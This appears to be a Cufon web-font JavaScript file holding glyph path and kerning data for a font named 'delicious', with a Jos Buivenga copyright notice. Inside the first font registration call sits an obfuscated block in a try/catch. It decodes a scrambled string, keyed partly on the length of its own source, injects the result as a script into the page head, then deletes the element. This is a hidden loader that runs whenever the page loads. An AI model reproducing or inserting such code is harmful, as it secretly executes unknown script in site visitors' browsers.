6,70,43,70v38,0,44,-40,44,-70r0,-139r28,0","w":200},{"d":"135,-227r0,24r-77,0r0,72r61,0r0,25r-61,0r0,106r-29,0r0,-227r106,0","w":148,"k":{"o":5,"e":5,"c":5,"a":7,"A":14,".":46,",":46}},{"d":"139,-15v-13,11,-33,20,-50,20v-50,0,-71,-48,-71,-91v0,-42,20,-96,70,-96v16,0,34,7,46,18r-12,16v-9,-7,-21,-12,-33,-12v-32,0,-44,44,-44,70v0,28,11,74,46,74v12,0,29,-10,39,-16","w":148},{"d":"16,-173v0,-64,86,-77,116,-33r-16,14v-18,-25,-72,-24,-72,15v0,53,97,48,97,121v0,62,-81,78,-120,40r12,-20v23,26,81,25,81,-21v0,-47,-98,-49,-98,-116","w":156},{"d":"51,-272r0,278r-22,0r0,-278r22,0","w":79},{"d":"252,-227r-53,227r-31,0r-40,-183r-41,183r-30,0r-53,-227r30,0r38,185r41,-185r29,0r42,185v6,-63,27,-125,39,-185r29,0","w":254,"k":{"u":4,"r":4,"o":11,"e":11,"c":11,"a":6,"A":6,";":13,":":13,".":20,"-":6,",":20}},{"d":"156,-155r-26,0v19,38,1,79,-36,89v-10,3,-40,12,-40,26v22,26,99,-5,99,49v0,41,-43,63,-79,63v-27,0,-60,-9,-60,-42v0,-23,18,-33,36,-43v-41,-7,-20,-50,8,-54v-23,-8,-38,-31,-38,-55v-2,-45,46,-73,87,-54r49,0r0,21xm79,-83v43,-1,44,-79,0,-80v-43,1,-44,79,0,80xm126,12v-6,-38,-86,-25,-85,12v7,46,85,30,85,-12","w":163},{"d":"45,-255v9,25,0,52,-3,79r-11,0v-3,-27,-12,-54,-3,-79r17,0","w":74},{"d":"167,-4v-17,7,-41,9,-59,9v-66,0,-88,-62,-88,-118v0,-53,26,-119,88,-119v24,0,38,5,59,15r-11,19v-14,-9,-31,-12,-48,-12v-41,0,-59,60,-59,98v0,38,12,94,60,94v10,0,22,-1,31,-5r0,-74r27,0r0,93","w":188,"k":{",":9}},{"d":"57,-227r0,227r-28,0r0,-227r28,0","w":85},{"d":"99,-208v-39,0,-50,66,-50,95v0,29,11,95,50,95v39,0,50,-66,50,-95v0,-29,-11,-95,-50,-95xm99,-232v59,0,78,71,78,119v0,48,-19,118,-78,118v-59,0,-79,-70,-79,-118v0,-48,20,-119,79,-119","w":197,"k":{"T":7,".":9,",":9}},{"d":"88,-160v-30,0,-43,45,-43,72v0,27,13,72,43,72v30,0,43,-45,43,-72v0,-27,-13,-72,-43,-72xm88,-182v49,0,70,53,70,94v0,41,-22,93,-70,93v-48,0,-70,-52,-70,-93v0,-41,21,-94,70,-94","w":175},{"d":"198,-115r-25,0r-61,-111r-61,111r-25,0v41,-71,76,-140,76,-140r20,0","w":224},{"d":"95,-243r-12,41r54,-19r0,23r-47,15r38,58r-25,0r-28,-44r-27,44r-24,0r35,-58r-46,-15r0,-23r54,19r-13,-41r41,0","w":152},{"d":"104,39r-4,19v-35,-1,-56,6,-56,-46v0,-42,4,-106,-30,-107r0,-17v34,0,30,-65,30,-107v0,-53,21,-45,56,-46r4,19v-27,0,-38,-6,-38,33r0,63v0,32,-27,47,-27,47v0,0,27,14,27,46v0,38,-21,112,38,96","w":119,"k":{"J":-7}},{"w":108},{"d":"94,-218r-12,16v-23,-12,-47,-28,-66,-46r23,-23v14,20,35,39,55,53","w":121},{"d":"14,-279v54,34,91,95,91,159v0,76,-31,128,-91,173r-3,-23v95,-66,98,-225,1,-289","w":122},{"d":"148,0r-30,0r-43,-69r-42,69r-29,0r56,-91r-53,-85r30,0r38,61r37,-61r29,0r-51,83","w":152},{"d":"137,-132v-1,47,-43,84,-74,108r80,0r0,24r-116,0r-5,-22v32,-17,87,-72,87,-110v0,-42,-61,-27,-82,-6r-5,-21v33,-35,117,-34,115,27"},{"d":"126,-117v0,-20,-13,-43,-36,-43v-23,0,-37,23,-41,43r77,0xm154,-97r-108,0v-1,31,8,81,43,81v14,0,38,-15,50,-23r8,18v-15,13,-40,26,-61,26v-97,0,-89,-187,7,-187v41,0,65,39,61,85","w":169},{"d":"153,-79r-58,0r0,62r-21,0r0,-62r-58,0r0,-22r58,0r0,-62r21,0r0,62r58,0r0,22","w":169},{"d":"92,-197r-27,100r54,0xm179,0r-29,0r-24,-73r-68,0r-24,73r-30,0r72,-227r31,0","w":183,"k":{"y":9,"w":9,"v":9,"Y":20,"W":6,"V":10,"T":14}},{"d":"88,-103r0,22r-69,0r0,-22r69,0","w":108},{"d":"142,-202r-55,0r0,202r-28,0r0,-202r-55,0r0,-25r138,0r0,25","w":145,"k":{"y":8,"w":9,"u":16,"s":16,"r":16,"o":23,"i":10,"e":23,"c":23,"a":23,"T":-6,"Q":7,"O":7,"G":7,"C":7,"A":14,";":33,":":33,".":33,"-":27,",":33}},{"d":"117,-66v8,-36,3,-89,-37,-94v-53,4,-52,106,1,104v12,0,26,-4,36,-10xm113,-46v-45,22,-98,-5,-98,-52v0,-41,18,-84,66,-84v51,0,66,60,66,101v0,67,-57,119,-115,142r-7,-21v41,-21,72,-41,88,-86"},{"d":"165,-13r-9,18v-13,0,-23,-7,-25,-20v-31,28,-102,34,-102,-27r0,-134r27,0r0,134v0,15,2,25,20,25v16,0,42,-9,54,-20r0,-139r27,0r0,149v0,6,0,13,8,14","w":186},{"d":"66,-264r0,21r-34,0r0,278r34,0r0,21r-56,0r0,-320r56,0","w":89,"k":{"J":-7}},{"d":"133,-157v-2,-40,-34,-50,-75,-47r0,92v35,22,77,-5,75,-45xm29,-227v69,-3,131,1,133,70v2,55,-51,92,-104,69r0,88r-29,0r0,-227","w":176,"k":{"o":4,"e":4,"c":4,"a":7,"A":15,".":52,",":52}},{"d":"142,0r-130,0r0,-23v27,-45,56,-90,91,-130r-84,0r0,-23r116,0r0,23v-33,41,-64,85,-91,130r98,0r0,23","w":153},{"d":"249,0r-28,0r0,-134v3,-39,-51,-25,-68,-9r0,143r-27,0r0,-134v2,-40,-52,-24,-69,-7r0,141r-27,0r0,-176r27,0r0,13v24,-20,70,-31,90,0v32,-26,102,-30,102,29r0,134","w":277},{"d":"70,-17v1,26,-44,30,-44,2v-1,-26,44,-30,44,-2xm70,-127v1,26,-44,30,-44,2v-1,-26,44,-30,44,-2","w":92},{"d":"111,30r-3,23v-60,-45,-91,-97,-91,-173v0,-64,36,-125,90,-159r3,20v-97,64,-94,223,1,289","w":120,"k":{"J":-7}},{"d":"171,0r-30,0r-85,-185v5,58,1,124,2,185r-29,0r0,-227r38,0r77,174v-4,-55,-1,-116,-2,-174r29,0r0,227","w":199},{"d":"168,0r-29,0r-82,-98r0,98r-27,0r0,-250r27,0r0,147r64,-73r32,0r-65,76r80,94r0,6","w":169},{"d":"24,39v43,-1,90,-24,89,-68v-1,-41,-52,-38,-83,-26r10,-121r90,0r0,21r-65,0r-6,73v38,-9,80,7,81,47v2,60,-53,96,-116,95r0,-21"},{"d":"235,-176v-10,60,-26,119,-48,176r-29,0r-25,-90v-6,-21,-11,-54,-11,-54v-3,34,-24,107,-34,144r-30,0r-54,-176r29,0r40,143r35,-143r28,0r38,143v15,-47,26,-94,35,-143r26,0","w":241,"k":{".":20,",":20}},{"d":"85,-17v56,0,43,-78,44,-137v-48,-20,-83,16,-83,60v0,25,4,77,39,77xm156,63r-27,0r0,-85v-9,19,-26,27,-46,27v-48,0,-65,-50,-65,-90v0,-43,20,-97,71,-97v23,0,45,5,67,11r0,234","w":185},{"d":"139,-176v5,87,-35,177,-79,239r-24,-10v40,-53,77,-139,77,-206r-92,0r0,-23r118,0"},{"d":"144,-227r0,25v-35,58,-68,117,-99,177r109,0r0,25r-141,0r0,-24v31,-60,63,-120,98,-178r-90,0r0,-25r123,0","w":164},{"d":"238,-227r0,227r-28,0r1,-185r-65,185r-25,0r-65,-186v4,53,1,128,2,186r-29,0r0,-227r38,0r67,192r66,-192r38,0","w":267},{"d":"121,2v15,15,34,29,59,22r-8,28v-41,6,-59,-29,-82,-47v-53,-6,-70,-72,-70,-118v0,-48,20,-119,79,-119v59,0,78,71,78,119v0,41,-14,100,-56,115xm99,-208v-39,0,-50,66,-50,95v0,29,11,95,50,95v39,0,50,-66,50,-95v0,-29,-11,-95,-50,-95","w":197,"k":{"T":7,".":9,",":9}},{"d":"91,-184v0,-15,-12,-27,-27,-27v-15,0,-26,12,-26,27v0,15,11,26,26,26v15,0,27,-11,27,-26xm64,-232v17,-1,32,12,51,11v39,-3,35,-17,59,-6r-80,227r-24,0r76,-210v-14,7,-38,7,-38,7v13,27,-11,67,-44,67v-26,0,-47,-22,-47,-48v0,-26,21,-48,47,-48xm234,-42v0,26,-22,47,-48,47v-26,0,-47,-21,-47,-47v0,-26,21,-48,47,-48v26,0,48,22,48,48xm213,-42v0,-15,-12,-27,-27,-27v-15,0,-26,12,-26,27v0,15,11,26,26,26v15,0,27,-11,27,-26","w":251},{"d":"149,-176v2,-31,-5,-54,-35,-55v-18,0,-36,10,-36,30v0,31,40,24,71,25xm46,-85v1,23,4,61,25,68v10,-2,34,-36,59,-20r-5,20v-27,-11,-28,21,-54,22v-41,0,-56,-56,-56,-89v0,-36,19,-84,60,-85v-14,-6,-25,-16,-25,-32v4,-65,122,-66,124,2r0,23r36,0r0,20r-35,0r0,120v-4,21,21,22,35,14r6,17v-28,19,-69,10,-69,-30r0,-121v-63,-5,-105,9,-101,71","w":226},{"d":"95,-92r0,72v34,-11,30,-60,0,-72xm78,-136r0,-73v-18,3,-28,16,-28,34v0,21,13,29,28,39xm147,-56v0,32,-21,55,-52,60r0,22r-17,0r0,-21v-18,0,-39,-6,-54,-15r8,-22v13,6,32,14,46,15r0,-85v-28,-18,-56,-33,-56,-71v0,-35,21,-57,56,-59r0,-20r17,0r0,21v15,2,32,8,44,17r-10,19v-9,-7,-22,-11,-34,-13r0,82v29,18,52,31,52,70","w":160},{"d":"117,-100r7,-55r-41,0r-7,55r41,0xm135,-243r22,0r-8,64r30,0r-2,24r-32,0r-6,55r27,0r-3,23r-27,0r-10,74r-21,0r9,-74r-41,0r-9,67r-21,0r8,-67r-29,0r4,-23r28,0r7,-55r-25,0r3,-24r25,0r9,-71r22,0r-9,71r41,0","w":200},{"d":"104,-95v-33,1,-29,66,-29,107v0,53,-22,45,-57,46r-4,-19v27,0,39,5,39,-32r0,-64v0,-32,27,-46,27,-46v0,0,-27,-15,-27,-47v0,-30,11,-97,-17,-96r-22,0r4,-19v36,1,57,-8,57,46v0,41,-5,106,29,107r0,17","w":119},{"d":"121,-79v0,-41,-45,-50,-75,-32v-8,37,-2,95,38,95v33,0,37,-37,37,-63xm119,-231r10,18v-36,23,-63,41,-78,83v45,-21,97,1,97,52v0,42,-19,83,-66,83v-51,0,-65,-56,-65,-97v0,-66,46,-112,102,-139"},{"d":"75,-17v1,25,-44,31,-44,2v-1,-26,44,-30,44,-2xm70,-252v-10,59,-5,127,-6,194r-22,0v-3,-65,-11,-130,1,-190","w":95},{"d":"53,-89v-4,-27,10,-44,31,-44v35,0,83,49,103,3v5,28,-10,45,-31,45v-35,-2,-83,-49,-103,-4","w":239},{"d":"172,0r-29,0r-85,-95r0,95r-29,0r0,-227r29,0r0,104r79,-104r30,0r-87,117r92,101r0,9","w":174,"k":{"Q":4,"O":4,"G":4,"C":4}},{"d":"56,-176r0,176r-26,0r0,-176r26,0xm22,-226v0,-24,40,-25,40,0v0,24,-40,25,-40,0","w":85},{"d":"138,-66v0,-46,-39,-42,-80,-42r0,84v37,13,81,0,80,-42xm125,-170v0,-36,-32,-35,-67,-34r0,73v37,3,67,-5,67,-39xm29,-227v62,-4,127,0,125,57v0,19,-15,44,-34,49v31,2,46,26,46,55v1,70,-77,82,-137,62r0,-223","w":180},{"d":"70,-17v1,26,-44,30,-44,2v-1,-26,44,-30,44,-2","w":92,"k":{"Q":9,"O":9,"G":9,"C":9}},{"d":"179,-165v-9,-11,-22,-17,-36,-17v-30,0,-40,53,-40,75v0,11,3,27,17,27v14,0,32,-13,44,-20xm190,-53v-17,1,-33,-11,-28,-30v-13,11,-29,26,-47,26v-24,0,-36,-24,-36,-46v0,-40,15,-99,65,-99v16,0,30,8,39,21r4,-15r23,0r-27,116v0,7,4,10,10,10v32,0,55,-50,55,-77v0,-60,-45,-94,-103,-94v-61,0,-106,55,-106,114v0,63,47,113,111,113v35,0,70,-15,92,-43r16,9v-22,33,-68,54,-108,54v-75,0,-135,-59,-135,-134v0,-69,61,-133,131,-133v68,0,120,44,120,114v0,39,-34,94,-76,94","w":285},{"d":"10,40v16,-25,25,-35,23,-65v0,0,10,-6,17,-6v11,0,23,16,23,16v0,0,-14,31,-46,66","w":92,"k":{"Q":9,"O":9,"C":9}},{"d":"81,-159v-35,0,-45,43,-45,71v0,28,10,71,45,71v35,0,45,-43,45,-71v0,-28,-10,-71,-45,-71xm152,-88v0,44,-20,93,-71,93v-51,0,-71,-49,-71,-93v0,-44,20,-94,71,-94v51,0,71,50,71,94"},{"d":"70,-17v1,26,-44,30,-44,2v-1,-26,44,-30,44,-2xm59,-58r-22,0v-7,-55,17,-89,43,-118v15,-16,21,-49,-8,-51v-10,0,-21,1,-31,3r0,-20v36,-12,83,-4,79,38v-6,58,-72,69,-61,148","w":128},{"d":"158,-176v-14,59,-36,122,-63,176r-27,0r-64,-176r29,0r49,145v21,-46,39,-95,49,-145r27,0","k":{".":27,",":27}},{"d":"152,0r-24,0r0,50r-25,0r0,-50r-90,0r-2,-23v20,-56,53,-106,88,-153r30,0r0,153r23,0r0,23xm103,-23r0,-120v-26,37,-48,78,-65,120r65,0"},{"d":"134,-46v-3,58,-80,64,-113,31r10,-20v20,20,72,32,77,-8v-9,-47,-94,-34,-91,-92v3,-56,87,-61,114,-22r-14,14v-18,-21,-68,-29,-73,7v13,43,92,33,90,90","w":151},{"d":"121,-59v0,-30,-23,-37,-45,-50v-43,14,-47,94,6,94v24,0,39,-22,39,-44xm114,-174v0,-23,-12,-33,-34,-33v-21,0,-33,18,-33,37v0,21,13,31,30,40v21,-10,37,-17,37,-44xm148,-61v0,42,-30,66,-70,66v-34,0,-63,-26,-63,-61v0,-28,18,-50,43,-62v-21,-13,-37,-26,-37,-53v0,-35,28,-56,61,-56v35,0,57,18,57,54v0,24,-20,43,-41,52v27,14,50,25,50,60"},{"d":"80,-264r0,320r-56,0r0,-21r33,0r0,-278r-33,0r0,-21r56,0","w":89},{"d":"170,-15v-16,13,-42,20,-63,20v-66,0,-87,-63,-87,-118v0,-53,26,-119,88,-119v19,0,42,5,58,15r-10,19v-15,-8,-31,-12,-48,-12v-43,0,-59,64,-59,98v0,38,12,94,60,94v16,0,36,-5,49,-15","w":178,"k":{",":9}},{"d":"165,-227r-66,144r0,83r-28,0r0,-83r-66,-144r30,0r51,113r50,-113r29,0","w":169,"k":{"z":5,"v":5,"u":11,"t":11,"s":13,"q":14,"p":11,"o":16,"n":11,"m":11,"i":13,"e":16,"c":16,"a":18,"Q":9,"O":9,"G":9,"C":9,"A":20,";":33,":":33,".":46,"-":27,",":46}},{"d":"122,-273r-93,326r-23,0r93,-326r23,0","w":128,"k":{"\/":36}},{"d":"145,-227r0,24r-87,0r0,72r67,0r0,25r-67,0r0,81r91,0r0,25r-120,0r0,-227r116,0","w":163},{"d":"9,40v16,-25,25,-35,23,-65v0,0,10,-6,17,-6v11,0,23,16,23,16v0,0,-14,31,-46,66xm70,-127v1,27,-44,31,-44,2v-1,-26,44,-30,44,-2","w":92},{"d":"133,-157v-2,-40,-34,-50,-75,-47r0,92v34,21,77,-4,75,-45xm173,0r-28,0r-75,-83v-4,-1,-8,-3,-12,-5r0,88r-29,0r0,-227v69,-3,132,1,133,70v0,36,-19,67,-56,74r67,74r0,9","w":181,"k":{"o":2,"e":2,"c":2,"Y":5,"V":4,"T":6}},{"d":"95,-182v30,0,12,16,8,30v-11,-10,-39,0,-46,14r0,138r-27,0r0,-176r27,0r0,14v8,-8,16,-20,38,-20","w":114,"k":{"o":2,"e":2,"c":2,".":33,"-":6,",":33}},{"d":"108,0r-27,0r0,-151r-45,0r0,-17v25,0,43,-11,72,-8r0,176"},{"d":"54,-250v3,85,-9,181,11,250r-29,0v-18,-71,-5,-166,-9,-250r27,0","w":84},{"d":"12,-36r17,14r67,-68r-66,-68r-17,14r53,54","w":108},{"d":"96,-36r-17,14r-67,-68r66,-68r17,14r-53,54","w":108},{"d":"153,-73r0,22r-137,0r0,-22r137,0xm153,-127r0,22r-137,0r0,-22r137,0","w":172},{"d":"99,-233v-1,0,-39,2,-39,33r0,24r35,0r0,20r-35,0r0,156r-27,0r0,-156r-24,-3r0,-17r24,0r0,-28v0,-41,43,-49,61,-51","w":102,"k":{"f":6}},{"d":"59,10v0,29,-26,43,-51,49r-6,-20v15,-5,29,-13,29,-31r0,-235r28,0r0,237","w":88},{"d":"168,0r-28,0r0,-106r-82,0r0,106r-29,0r0,-227r29,0r0,96r82,0r0,-96r28,0r0,227","w":197}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+173-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("W](^vD*+;xiGWy@jHDg-J]Ji~:*^(DiG~:B-;x8O(lC1Zh+MZO8Z(q*EZlidv@(Tegz^LqFbLX8sJ@zssgl]Z^*Cl:sO8+@tv^=E`-F!W~!-(9UF.lPd}FyqXg]fJBW.L*wtP89eRlx~Z(;vsH`u!bMN5@DOT4E&1UG_Vz-h+^:#=d7jCi|IHlUP`D+7WXd&*~Hz*^4*R9RDBy*i*Mg|9:@y.5}1Lqi:*fL=~R*(~yigw^B-LxV|tq^D95!M.O*Vv]@+WyJMW9z4te}1sq^M.O}1vq^V.Dz@vDH+;yzOtxJG(MdOvf@V;fLi`#+j;xZTZMd_;h+_~M!IwOH#H^VGWeCTth41v:*bv]b_s#8CZDl1v]gMv:iMZxB@~ydNv:+4Byi4.O8@s#PTv]iNZ~84v:=G;]ihH]dbvxR4Wx(_sM!j;ez1w-1&;9@Ox:*v;l^Ht~Fv;l^iW9!4")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":162,"face":{"font-family":"delicious","font-weight":500,"font-stretch":"normal","units-per-em":"360","panose-1":"0 0 0 0 0 0 0 0 0 0","ascent":"288","descent":"-72","x-height":"5","bbox":"0 -279 266 72","underline-thickness":"7.2","underline-position":"-46.8","stemh":"22","stemv":"27","unicode-range":"U+0020-U+007E"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * copyright 1994-1996, Jos Buivenga
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"114,0r-37,0r0,-140r-42,0r0,-28v26,0,48,-11,79,-8r0,176"},{"d":"108,-119v0,79,-35,128,-97,174r-4,-35v90,-62,93,-208,1,-268r4,-32v57,35,96,93,96,161","w":122},{"d":"167,-15r-11,20v-12,-1,-25,-12,-28,-21v-31,29,-101,33,-101,-29r0,-131r37,0r0,131v1,33,45,10,58,-1r0,-130r38,0r0,143v0,12,7,18,7,18","w":186},{"d":"78,-22v1,31,-53,38,-53,4v-1,-31,53,-38,53,-4xm76,-252v-11,56,-6,120,-7,185r-33,0v-2,-61,-9,-122,1,-180","w":95},{"d":"143,0r-131,0r0,-30v24,-41,52,-83,76,-113r-69,0r0,-33r117,0r0,30v-24,31,-59,80,-78,112r85,0r0,34","w":153},{"d":"157,-90r-103,0v-1,25,6,63,34,63v15,0,35,-10,47,-19r13,24v-15,13,-42,27,-62,27v-101,0,-93,-191,7,-187v43,2,70,41,64,92xm119,-122v-1,-17,-11,-32,-29,-32v-18,0,-27,16,-31,32r60,0","w":169},{"d":"71,56r-66,0r0,-319r66,0r0,32r-32,0r0,255r32,0r0,32","w":89,"k":{"J":-7}},{"d":"251,0r-38,0r0,-132v-1,-33,-42,-10,-52,-1r0,133r-38,0r0,-127v2,-42,-48,-11,-58,-3r0,130r-38,0r0,-176r38,0r0,12v18,-20,73,-25,86,3v11,-7,31,-21,49,-21v40,0,51,22,51,50r0,132","w":277},{"d":"101,-182v96,5,87,187,-10,187v-23,0,-45,-9,-63,-23r0,-232r38,0r0,87v8,-9,23,-19,35,-19xm128,-95v0,-19,-4,-53,-30,-53v-10,0,-25,11,-32,18r0,95v8,5,19,9,28,9v29,0,34,-47,34,-69","w":181},{"d":"157,-144r-21,0v16,43,-7,84,-53,87v-6,1,-21,4,-21,16v4,12,33,7,48,7v24,0,45,14,45,40v0,42,-42,65,-80,65v-29,0,-63,-11,-63,-45v0,-18,20,-32,33,-38v-11,-1,-22,-13,-22,-25v0,-14,13,-24,26,-29v-55,-26,-31,-123,33,-116v22,2,47,8,75,6r0,32xm81,-87v35,0,32,-66,-1,-67v-19,0,-25,16,-25,32v0,18,5,35,26,35xm119,9v0,-20,-29,-12,-48,-14v0,0,-22,11,-22,26v0,18,14,23,27,23v21,0,43,-13,43,-35","w":163},{"d":"158,63r-38,0r0,-76v-8,10,-24,18,-37,18v-49,0,-68,-45,-68,-87v0,-44,22,-100,73,-100v31,0,70,14,70,14r0,231xm85,-27v47,0,33,-68,35,-118v0,0,-20,-6,-33,-4v-27,4,-33,41,-33,63v0,19,5,59,31,59","w":185},{"w":108},{"d":"154,0r-141,0r0,-31v26,-54,54,-107,84,-160r-77,0r0,-36r125,0r0,32v-30,52,-60,105,-87,159r96,0r0,36","w":164},{"d":"172,0r-36,0r-70,-80r0,80r-39,0r0,-227r39,0r0,87r63,-87r42,0r-83,116r84,95r0,16","w":174,"k":{"Q":4,"O":4,"G":4,"C":4}},{"d":"84,56r-65,0r0,-32r32,0r0,-255r-32,0r0,-32r65,0r0,319","w":89},{"d":"234,-45v0,28,-22,50,-50,50v-28,0,-51,-22,-51,-50v0,-28,23,-51,51,-51v28,0,50,23,50,51xm203,-45v0,-11,-8,-20,-19,-20v-11,0,-20,9,-20,20v0,11,9,19,20,19v11,0,19,-8,19,-19xm67,-232v17,-1,28,12,47,12v18,0,40,-6,57,-12r27,7r-113,225r-35,0r103,-205v-11,9,-23,11,-37,11v7,36,-17,62,-49,63v-28,0,-51,-22,-51,-50v0,-28,23,-51,51,-51xm86,-181v0,-11,-8,-20,-19,-20v-11,0,-20,9,-20,20v0,11,9,19,20,19v11,0,19,-8,19,-19","w":251},{"d":"162,54r-162,0r0,-32r162,0r0,32"},{"d":"108,-91v-35,0,-26,61,-28,99v-2,57,-25,50,-65,50r-6,-30v22,-2,40,9,38,-24v-3,-41,-3,-97,24,-107v-25,-8,-28,-67,-24,-107v3,-35,-15,-23,-38,-25r6,-30v40,0,62,-7,65,50v2,39,-8,99,28,99r0,25","w":119},{"d":"71,0r-39,0v-17,-51,-8,-176,-10,-250r37,0v4,86,-10,181,12,250","w":84},{"d":"169,-68v1,73,-81,85,-143,63r0,-222v62,0,128,-7,131,55v0,20,-13,41,-31,50v26,4,43,28,43,54xm118,-167v1,-31,-25,-27,-52,-27r0,58v29,2,52,-3,52,-31xm130,-68v-1,-37,-31,-34,-64,-34r0,70v31,9,65,-2,64,-36","w":180},{"d":"64,5v0,31,-30,46,-56,54r-9,-27v12,-5,26,-14,26,-29r0,-230r39,0r0,232","w":88},{"d":"175,-227v-5,98,28,232,-75,232v-103,0,-68,-135,-74,-232r40,0r0,138v0,24,2,60,34,60v32,0,35,-36,35,-60r0,-138r40,0","w":200},{"d":"103,-5v-30,21,-74,9,-74,-34r0,-106r-23,-4r0,-27r24,0r0,-32r36,0r0,32r32,0r0,32r-31,0r0,104v0,6,0,13,9,13v8,0,18,-5,18,-5","w":110},{"d":"175,0r-45,0r-43,-81r-41,81r-43,0r63,-116r-62,-111r44,0r39,75r38,-75r42,0r-58,109","w":177},{"d":"252,-227r-52,227r-39,0r-34,-158v-7,57,-23,105,-33,158r-39,0r-52,-227r40,0v10,53,27,102,32,160v5,-58,24,-106,34,-160r37,0v11,53,29,102,34,160v5,-58,22,-107,32,-160r40,0","w":254,"k":{"u":4,"r":4,"o":11,"e":11,"c":11,"a":6,"A":6,";":13,":":13,".":20,"-":6,",":20}},{"d":"148,-80v0,67,-58,117,-116,140r-10,-28v34,-17,63,-38,80,-73v-43,20,-90,-8,-90,-55v0,-42,20,-86,68,-86v56,0,68,57,68,102xm109,-69v5,-31,1,-76,-31,-82v-42,5,-40,90,2,89v9,0,20,-3,29,-7"},{"d":"109,28r-6,30v-39,0,-61,6,-64,-50v-2,-39,8,-99,-28,-99r0,-25v36,0,26,-61,28,-99v2,-57,24,-50,64,-50r6,30v-22,2,-40,-10,-37,25v4,41,1,99,-25,107v27,9,28,65,25,107v-2,33,15,22,37,24","w":119,"k":{"J":-7}},{"d":"161,0r-38,0r0,-130v0,-14,-2,-19,-14,-19v-16,0,-35,12,-44,19r0,130r-38,0r0,-250r38,0r0,87v12,-9,33,-19,48,-19v40,0,48,25,48,52r0,130","w":186},{"d":"93,-76r-78,0r0,-32r78,0r0,32","w":108},{"d":"181,-227r-70,227r-39,0r-70,-227r42,0r48,168r48,-168r41,0","w":183,"k":{"y":4,"u":11,"r":11,"o":9,"i":6,"e":9,"c":9,"a":11,"A":10,";":20,":":20,".":33,"-":13,",":33}},{"d":"62,15v0,35,-33,48,-55,55r-8,-27v13,-4,25,-15,25,-30r0,-189r38,0r0,191xm68,-222v1,30,-50,33,-50,2v-1,-30,50,-33,50,-2","w":85},{"d":"73,-22v0,15,-12,27,-27,27v-14,0,-25,-9,-25,-23v0,-30,53,-38,52,-4xm73,-125v0,15,-12,27,-27,27v-14,0,-25,-10,-25,-24v0,-15,13,-27,28,-27v14,0,24,10,24,24","w":92},{"d":"175,0r-35,0r-74,-81r0,81r-39,0r0,-227r52,0v63,0,86,32,86,72v0,34,-21,69,-54,72r64,67r0,16xm125,-155v2,-27,-22,-41,-59,-38r0,78v27,12,64,-7,59,-40","w":181,"k":{"o":2,"e":2,"c":2,"Y":5,"V":4,"T":6}},{"d":"161,0r-38,0r0,-130v0,-14,-2,-19,-14,-19v-16,0,-35,12,-44,19r0,130r-38,0r0,-176r38,0r0,13v12,-9,33,-19,48,-19v40,0,48,25,48,52r0,130","w":186},{"d":"144,-59v0,64,-85,82,-124,42r18,-28v19,21,68,25,67,-14v0,-38,-90,-44,-90,-113v0,-65,91,-78,123,-32r-21,21v-16,-20,-63,-27,-63,9v0,48,90,42,90,115","w":156},{"d":"134,0r-108,0r0,-227r37,0r0,192r71,0r0,35","w":137,"k":{"y":10,"Y":23,"W":13,"V":16,"T":20}},{"d":"180,11r-7,39v-40,7,-63,-24,-86,-45v-50,-8,-69,-68,-69,-118v0,-53,23,-119,81,-119v103,0,105,196,25,233v17,13,35,16,56,10xm140,-113v0,-35,-8,-85,-41,-85v-33,0,-42,50,-42,85v0,35,9,84,42,84v33,0,41,-49,41,-84","w":197,"k":{"T":7,".":9,",":9}},{"d":"237,-176v-8,62,-30,126,-52,176r-36,0r-18,-65v-5,-18,-9,-48,-9,-48v-3,25,-20,85,-28,113r-38,0r-54,-176r40,0r33,119r28,-119r36,0r31,119v12,-39,24,-84,28,-119r39,0","w":241,"k":{".":20,",":20}},{"d":"139,-192r-74,0r0,56r58,0r0,36r-58,0r0,100r-39,0r0,-227r113,0r0,35","w":148,"k":{"o":5,"e":5,"c":5,"a":7,"A":14,".":46,",":46}},{"d":"56,5r-32,0r0,-276r32,0r0,276","w":79},{"d":"144,-35v0,70,-59,95,-121,95r0,-29v36,-1,83,-17,83,-61v0,-35,-46,-27,-77,-25r0,-29v30,0,42,-20,61,-31v14,-8,17,-34,-4,-34v-16,0,-51,19,-51,19r-9,-28v33,-28,113,-36,114,19v0,24,-26,46,-44,53v27,3,48,25,48,51"},{"d":"101,-227v0,0,-35,2,-35,32r0,19r32,0r0,31r-32,0r0,145r-38,0r0,-145r-23,-4r0,-27r23,0r0,-21v0,-55,67,-57,67,-57","w":102,"k":{"f":6}},{"d":"80,-135v27,-8,40,-62,0,-63v-18,0,-25,15,-25,31v0,16,12,25,25,32xm113,-62v0,-21,-20,-32,-36,-41v-34,12,-37,78,5,78v19,0,31,-19,31,-37xm109,-120v67,21,46,125,-30,125v-36,0,-66,-27,-66,-64v0,-29,14,-46,37,-60v-53,-24,-32,-115,32,-108v65,-7,80,86,27,107"},{"d":"165,-227r-61,142r0,85r-39,0r0,-85r-60,-142r42,0r38,103r40,-103r40,0","w":169,"k":{"z":5,"v":5,"u":11,"t":11,"s":13,"q":14,"p":11,"o":16,"n":11,"m":11,"i":13,"e":16,"c":16,"a":18,"Q":9,"O":9,"G":9,"C":9,"A":20,";":33,":":33,".":46,"-":27,",":46}},{"d":"125,51r-34,0r-92,-321r34,0","w":120},{"d":"102,-46v-12,-41,-87,-30,-86,-84v1,-59,88,-67,117,-27r-20,19v-16,-18,-55,-23,-60,5v17,37,88,29,86,84v-2,61,-83,67,-118,33r14,-25v17,14,63,30,67,-5","w":150},{"d":"150,0r-43,0r-31,-60r-31,60r-41,0r51,-91r-48,-85r42,0r27,53r27,-53r41,0r-48,83","w":152},{"d":"21,40v25,-8,32,-18,44,-40r-61,-176r40,0v10,33,32,99,32,99v4,12,7,24,9,36v15,-44,27,-89,36,-135r38,0v-21,68,-43,237,-130,245","w":163,"k":{".":27,",":27}},{"w":108},{"d":"152,0r-126,0r0,-227r122,0r0,35r-83,0r0,56r64,0r0,36r-64,0r0,64r87,0r0,36","w":163},{